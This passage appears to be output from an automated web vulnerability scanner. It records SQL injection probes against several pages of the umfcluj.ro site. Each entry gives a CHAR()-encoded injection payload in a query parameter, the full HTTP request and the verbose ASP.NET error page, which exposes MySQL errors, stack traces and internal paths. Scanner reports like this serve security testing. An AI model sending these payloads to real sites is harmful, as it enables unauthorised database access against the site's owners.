at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /detaliu.aspx

/detaliu.aspx

http://umfcluj.ro/detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
eID GET 289
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBAK1xMK9BQLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwUJODE0NzU5NDcxZGQ=
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&eID=289 HTTP/1.1
Referer: http://umfcluj.ro/detaliu.aspx?t=Noutati&eID=289
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 229
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBAK1xMK9BQLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUJODE0NzU5NDcxZGQ%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:29:39 GMT
Content-Length: 6411


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /rezultateleCautarii.aspx

/rezultateleCautarii.aspx

http://umfcluj.ro/rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(6..

Parameters

Parameter Type Value
n GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/js/common.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:42:33 GMT
Content-Length: 6809


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3]
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:427
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32&amp; Total, ArrayList&amp; subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:438
Netlogiq.Web.rezultateleCautarii.PopulatePage() +140
Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 427
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32& Total, ArrayList& subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 438
at Netlogiq.Web.rezultateleCautarii.PopulatePage()
at Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.rezultatelecautarii_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.16.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /lista.aspx

/lista.aspx

http://umfcluj.ro/lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
y GET 2011
m GET 2
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwULLTIwMjEzOTE2MTVkZA==
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /lista.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&y=2011&m=2 HTTP/1.1
Referer: http://umfcluj.ro/lista.aspx?t=Noutati&y=2011&m=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 235
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALi3Yf6AgLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwULLTIwMjEzOTE2MTVkZA%3d%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 19:23:54 GMT
Content-Length: 6981


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /detaliu.aspx

/detaliu.aspx

http://umfcluj.ro/detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50..

Parameters

Parameter Type Value
t GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
eID GET 289
__VIEWSTATE POST /wEPDwUJODE0NzU5NDcxZGQ=

Request

POST /detaliu.aspx?t='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&eID=289 HTTP/1.1
Referer: http://umfcluj.ro/detaliu.aspx?t=Noutati&eID=289
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 40
Accept-Encoding: gzip, deflate

__VIEWSTATE=%2fwEPDwUJODE0NzU5NDcxZGQ%3d

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 19:29:02 GMT
Content-Length: 6411


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
